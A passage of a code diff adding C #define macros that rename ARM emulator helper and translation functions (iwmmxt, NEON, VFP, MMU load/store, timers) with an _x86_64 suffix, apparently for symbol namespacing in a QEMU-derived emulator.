gen_op_iwmmxt_mulshw_M0_wRn_x86_64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_x86_64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_x86_64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_x86_64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_x86_64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_x86_64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_x86_64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_x86_64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_x86_64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_x86_64 +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_x86_64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_x86_64 +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_x86_64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_x86_64 +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_x86_64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_x86_64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_x86_64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_x86_64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_x86_64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_x86_64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_x86_64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_x86_64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_x86_64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_x86_64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_x86_64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_x86_64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_x86_64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_x86_64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_x86_64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_x86_64 +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_x86_64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_x86_64 +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_x86_64 +#define gen_rev16 gen_rev16_x86_64 +#define gen_revsh gen_revsh_x86_64 +#define gen_rfe gen_rfe_x86_64 +#define gen_sar gen_sar_x86_64 +#define gen_sbc_CC gen_sbc_CC_x86_64 +#define gen_sbfx gen_sbfx_x86_64 +#define gen_set_CF_bit31 gen_set_CF_bit31_x86_64 +#define gen_set_condexec gen_set_condexec_x86_64 +#define gen_set_cpsr gen_set_cpsr_x86_64 +#define gen_set_label gen_set_label_x86_64 +#define gen_set_pc_im gen_set_pc_im_x86_64 +#define gen_set_psr gen_set_psr_x86_64 +#define gen_set_psr_im gen_set_psr_im_x86_64 +#define gen_shl gen_shl_x86_64 +#define gen_shr gen_shr_x86_64 +#define gen_smc gen_smc_x86_64 +#define gen_smul_dual gen_smul_dual_x86_64 +#define gen_srs gen_srs_x86_64 +#define gen_ss_advance gen_ss_advance_x86_64 +#define gen_step_complete_exception gen_step_complete_exception_x86_64 +#define gen_store_exclusive gen_store_exclusive_x86_64 +#define gen_storeq_reg gen_storeq_reg_x86_64 +#define gen_sub_carry gen_sub_carry_x86_64 +#define gen_sub_CC gen_sub_CC_x86_64 +#define gen_subq_msw gen_subq_msw_x86_64 +#define gen_swap_half gen_swap_half_x86_64 +#define gen_thumb2_data_op gen_thumb2_data_op_x86_64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_x86_64 +#define gen_ubfx gen_ubfx_x86_64 +#define gen_vfp_abs gen_vfp_abs_x86_64 +#define gen_vfp_add gen_vfp_add_x86_64 +#define gen_vfp_cmp gen_vfp_cmp_x86_64 +#define gen_vfp_cmpe gen_vfp_cmpe_x86_64 +#define gen_vfp_div gen_vfp_div_x86_64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_x86_64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_x86_64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_x86_64 +#define gen_vfp_ld gen_vfp_ld_x86_64 +#define gen_vfp_mrs gen_vfp_mrs_x86_64 +#define gen_vfp_msr gen_vfp_msr_x86_64 +#define gen_vfp_mul gen_vfp_mul_x86_64 +#define gen_vfp_neg gen_vfp_neg_x86_64 +#define gen_vfp_shto gen_vfp_shto_x86_64 +#define gen_vfp_sito gen_vfp_sito_x86_64 +#define gen_vfp_slto gen_vfp_slto_x86_64 +#define gen_vfp_sqrt gen_vfp_sqrt_x86_64 +#define gen_vfp_st gen_vfp_st_x86_64 +#define gen_vfp_sub gen_vfp_sub_x86_64 +#define gen_vfp_tosh gen_vfp_tosh_x86_64 +#define gen_vfp_tosi gen_vfp_tosi_x86_64 +#define gen_vfp_tosiz gen_vfp_tosiz_x86_64 +#define gen_vfp_tosl gen_vfp_tosl_x86_64 +#define gen_vfp_touh gen_vfp_touh_x86_64 +#define gen_vfp_toui gen_vfp_toui_x86_64 +#define gen_vfp_touiz gen_vfp_touiz_x86_64 +#define gen_vfp_toul gen_vfp_toul_x86_64 +#define gen_vfp_uhto gen_vfp_uhto_x86_64 +#define gen_vfp_uito gen_vfp_uito_x86_64 +#define gen_vfp_ulto gen_vfp_ulto_x86_64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_x86_64 +#define get_clock get_clock_x86_64 +#define get_clock_realtime get_clock_realtime_x86_64 +#define get_constraint_priority get_constraint_priority_x86_64 +#define get_float_exception_flags get_float_exception_flags_x86_64 +#define get_float_rounding_mode get_float_rounding_mode_x86_64 +#define get_fpstatus_ptr get_fpstatus_ptr_x86_64 +#define get_level1_table_address get_level1_table_address_x86_64 +#define get_mem_index get_mem_index_x86_64 +#define get_next_param_value get_next_param_value_x86_64 +#define get_opt_name get_opt_name_x86_64 +#define get_opt_value get_opt_value_x86_64 +#define get_page_addr_code get_page_addr_code_x86_64 +#define get_param_value get_param_value_x86_64 +#define get_phys_addr get_phys_addr_x86_64 +#define get_phys_addr_lpae get_phys_addr_lpae_x86_64 +#define get_phys_addr_mpu get_phys_addr_mpu_x86_64 +#define get_phys_addr_v5 get_phys_addr_v5_x86_64 +#define get_phys_addr_v6 get_phys_addr_v6_x86_64 +#define get_system_memory get_system_memory_x86_64 +#define get_ticks_per_sec get_ticks_per_sec_x86_64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_x86_64 +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__x86_64 +#define gt_cntfrq_access gt_cntfrq_access_x86_64 +#define gt_cnt_read gt_cnt_read_x86_64 +#define gt_cnt_reset gt_cnt_reset_x86_64 +#define gt_counter_access gt_counter_access_x86_64 +#define gt_ctl_write gt_ctl_write_x86_64 +#define gt_cval_write gt_cval_write_x86_64 +#define gt_get_countervalue gt_get_countervalue_x86_64 +#define gt_pct_access gt_pct_access_x86_64 +#define gt_ptimer_access gt_ptimer_access_x86_64 +#define gt_recalc_timer gt_recalc_timer_x86_64 +#define gt_timer_access gt_timer_access_x86_64 +#define gt_tval_read gt_tval_read_x86_64 +#define gt_tval_write gt_tval_write_x86_64 +#define gt_vct_access gt_vct_access_x86_64 +#define gt_vtimer_access gt_vtimer_access_x86_64 +#define guest_phys_blocks_free guest_phys_blocks_free_x86_64 +#define guest_phys_blocks_init guest_phys_blocks_init_x86_64 +#define handle_vcvt handle_vcvt_x86_64 +#define handle_vminmaxnm handle_vminmaxnm_x86_64 +#define handle_vrint handle_vrint_x86_64 +#define handle_vsel handle_vsel_x86_64 +#define has_help_option has_help_option_x86_64 +#define have_bmi1 have_bmi1_x86_64 +#define have_bmi2 have_bmi2_x86_64 +#define hcr_write hcr_write_x86_64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_x86_64 +#define helper_add_saturate helper_add_saturate_x86_64 +#define helper_add_setq helper_add_setq_x86_64 +#define helper_add_usaturate helper_add_usaturate_x86_64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_x86_64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_x86_64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_x86_64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_x86_64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_x86_64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_x86_64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_x86_64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_x86_64 +#define helper_be_stl_mmu helper_be_stl_mmu_x86_64 +#define helper_be_stq_mmu helper_be_stq_mmu_x86_64 +#define helper_be_stw_mmu helper_be_stw_mmu_x86_64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_x86_64 +#define helper_clz_arm helper_clz_arm_x86_64 +#define helper_cpsr_read helper_cpsr_read_x86_64 +#define helper_cpsr_write helper_cpsr_write_x86_64 +#define helper_crc32_arm helper_crc32_arm_x86_64 +#define helper_crc32c helper_crc32c_x86_64 +#define helper_crypto_aese helper_crypto_aese_x86_64 +#define helper_crypto_aesmc helper_crypto_aesmc_x86_64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_x86_64 +#define helper_crypto_sha1h helper_crypto_sha1h_x86_64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_x86_64 +#define helper_crypto_sha256h helper_crypto_sha256h_x86_64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_x86_64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_x86_64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_x86_64 +#define helper_dc_zva helper_dc_zva_x86_64 +#define helper_double_saturate helper_double_saturate_x86_64 +#define helper_exception_internal helper_exception_internal_x86_64 +#define helper_exception_return helper_exception_return_x86_64 +#define helper_exception_with_syndrome helper_exception_with_syndrome_x86_64 +#define helper_get_cp_reg helper_get_cp_reg_x86_64 +#define helper_get_cp_reg64 helper_get_cp_reg64_x86_64 +#define helper_get_r13_banked helper_get_r13_banked_x86_64 +#define helper_get_user_reg helper_get_user_reg_x86_64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_x86_64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_x86_64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_x86_64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_x86_64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_x86_64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_x86_64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_x86_64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_x86_64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_x86_64 +#define helper_iwmmxt_addub helper_iwmmxt_addub_x86_64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_x86_64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_x86_64 +#define helper_iwmmxt_align helper_iwmmxt_align_x86_64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_x86_64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_x86_64 +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_x86_64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_x86_64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_x86_64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_x86_64 +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_x86_64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_x86_64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_x86_64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_x86_64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_x86_64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_x86_64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_x86_64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_x86_64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_x86_64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_x86_64 +#define helper_iwmmxt_insr helper_iwmmxt_insr_x86_64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_x86_64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_x86_64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_x86_64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_x86_64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_x86_64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_x86_64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_x86_64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_x86_64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_x86_64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_x86_64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_x86_64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_x86_64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_x86_64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_x86_64 +#define helper_iwmmxt_minul helper_iwmmxt_minul_x86_64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_x86_64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_x86_64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_x86_64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_x86_64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_x86_64 +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_x86_64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_x86_64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_x86_64 +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_x86_64 +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_x86_64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_x86_64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_x86_64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_x86_64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_x86_64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_x86_64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_x86_64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_x86_64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_x86_64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_x86_64 +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_x86_64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_x86_64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_x86_64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_x86_64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_x86_64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_x86_64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_x86_64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_x86_64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_x86_64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_x86_64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_x86_64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_x86_64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_x86_64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_x86_64 +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_x86_64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_x86_64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_x86_64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_x86_64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_x86_64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_x86_64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_x86_64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_x86_64 +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_x86_64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_x86_64 +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_x86_64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_x86_64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_x86_64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_x86_64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_x86_64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_x86_64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_x86_64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_x86_64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_x86_64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_x86_64 +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_x86_64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_x86_64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_x86_64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_x86_64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_x86_64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_x86_64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_x86_64 +#define helper_ldb_cmmu helper_ldb_cmmu_x86_64 +#define helper_ldb_mmu helper_ldb_mmu_x86_64 +#define helper_ldl_cmmu helper_ldl_cmmu_x86_64 +#define helper_ldl_mmu helper_ldl_mmu_x86_64 +#define helper_ldq_cmmu helper_ldq_cmmu_x86_64 +#define helper_ldq_mmu helper_ldq_mmu_x86_64 +#define helper_ldw_cmmu helper_ldw_cmmu_x86_64 +#define helper_ldw_mmu helper_ldw_mmu_x86_64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_x86_64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_x86_64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_x86_64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_x86_64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_x86_64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_x86_64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_x86_64 +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_x86_64 +#define helper_le_stl_mmu helper_le_stl_mmu_x86_64 +#define helper_le_stq_mmu helper_le_stq_mmu_x86_64 +#define helper_le_stw_mmu helper_le_stw_mmu_x86_64 +#define helper_msr_i_pstate helper_msr_i_pstate_x86_64 +#define helper_neon_abd_f32 helper_neon_abd_f32_x86_64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_x86_64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_x86_64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_x86_64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_x86_64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_x86_64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_x86_64 +#define helper_neon_abd_s16 helper_neon_abd_s16_x86_64 +#define helper_neon_abd_s32 helper_neon_abd_s32_x86_64 +#define helper_neon_abd_s8 helper_neon_abd_s8_x86_64 +#define helper_neon_abd_u16 helper_neon_abd_u16_x86_64 +#define helper_neon_abd_u32 helper_neon_abd_u32_x86_64 +#define helper_neon_abd_u8 helper_neon_abd_u8_x86_64 +#define helper_neon_abs_s16 helper_neon_abs_s16_x86_64 +#define helper_neon_abs_s8 helper_neon_abs_s8_x86_64 +#define helper_neon_acge_f32 helper_neon_acge_f32_x86_64 +#define helper_neon_acge_f64 helper_neon_acge_f64_x86_64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_x86_64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_x86_64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_x86_64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_x86_64 +#define helper_neon_addl_u16 helper_neon_addl_u16_x86_64 +#define helper_neon_addl_u32 helper_neon_addl_u32_x86_64 +#define helper_neon_add_u16 helper_neon_add_u16_x86_64 +#define helper_neon_add_u8 helper_neon_add_u8_x86_64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_x86_64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_x86_64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_x86_64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_x86_64 +#define helper_neon_cge_f32 helper_neon_cge_f32_x86_64 +#define helper_neon_cge_s16 helper_neon_cge_s16_x86_64 +#define helper_neon_cge_s32 helper_neon_cge_s32_x86_64 +#define helper_neon_cge_s8 helper_neon_cge_s8_x86_64 +#define helper_neon_cge_u16 helper_neon_cge_u16_x86_64 +#define helper_neon_cge_u32 helper_neon_cge_u32_x86_64 +#define helper_neon_cge_u8 helper_neon_cge_u8_x86_64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_x86_64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_x86_64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_x86_64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_x86_64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_x86_64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_x86_64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_x86_64 +#define helper_neon_cls_s16 helper_neon_cls_s16_x86_64 +#define helper_neon_cls_s32 helper_neon_cls_s32_x86_64 +#define helper_neon_cls_s8 helper_neon_cls_s8_x86_64 +#define helper_neon_clz_u16 helper_neon_clz_u16_x86_64 +#define helper_neon_clz_u8 helper_neon_clz_u8_x86_64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_x86_64 +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_x86_64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_x86_64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_x86_64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_x86_64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_x86_64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_x86_64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_x86_64 +#define helper_neon_hadd_u8 helper_neon_hadd_u8_x86_64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_x86_64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_x86_64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_x86_64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_x86_64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_x86_64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_x86_64 +#define helper_neon_max_s16 helper_neon_max_s16_x86_64 +#define helper_neon_max_s32 helper_neon_max_s32_x86_64 +#define helper_neon_max_s8 helper_neon_max_s8_x86_64 +#define helper_neon_max_u16 helper_neon_max_u16_x86_64 +#define helper_neon_max_u32 helper_neon_max_u32_x86_64 +#define helper_neon_max_u8 helper_neon_max_u8_x86_64 +#define helper_neon_min_s16 helper_neon_min_s16_x86_64 +#define helper_neon_min_s32 helper_neon_min_s32_x86_64 +#define helper_neon_min_s8 helper_neon_min_s8_x86_64 +#define helper_neon_min_u16 helper_neon_min_u16_x86_64 +#define helper_neon_min_u32 helper_neon_min_u32_x86_64 +#define helper_neon_min_u8 helper_neon_min_u8_x86_64 +#define helper_neon_mull_p8 helper_neon_mull_p8_x86_64 +#define helper_neon_mull_s16 helper_neon_mull_s16_x86_64 +#define helper_neon_mull_s8 helper_neon_mull_s8_x86_64 +#define helper_neon_mull_u16 helper_neon_mull_u16_x86_64 +#define helper_neon_mull_u8 helper_neon_mull_u8_x86_64 +#define helper_neon_mul_p8 helper_neon_mul_p8_x86_64 +#define helper_neon_mul_u16 helper_neon_mul_u16_x86_64 +#define helper_neon_mul_u8 helper_neon_mul_u8_x86_64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_x86_64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_x86_64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_x86_64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_x86_64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_x86_64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_x86_64 +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_x86_64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_x86_64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_x86_64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_x86_64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_x86_64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_x86_64 +#define helper_neon_negl_u16 helper_neon_negl_u16_x86_64 +#define helper_neon_negl_u32 helper_neon_negl_u32_x86_64 +#define helper_neon_paddl_u16 helper_neon_paddl_u16_x86_64 +#define helper_neon_paddl_u32 helper_neon_paddl_u32_x86_64 +#define helper_neon_padd_u16 helper_neon_padd_u16_x86_64 +#define helper_neon_padd_u8 helper_neon_padd_u8_x86_64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_x86_64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_x86_64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_x86_64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_x86_64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_x86_64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_x86_64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_x86_64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_x86_64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_x86_64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_x86_64 +#define helper_neon_qabs_s16 helper_neon_qabs_s16_x86_64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_x86_64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_x86_64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_x86_64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_x86_64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_x86_64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_x86_64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_x86_64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_x86_64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_x86_64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_x86_64 +#define helper_neon_qadd_u8 helper_neon_qadd_u8_x86_64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_x86_64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_x86_64 +#define helper_neon_qneg_s16 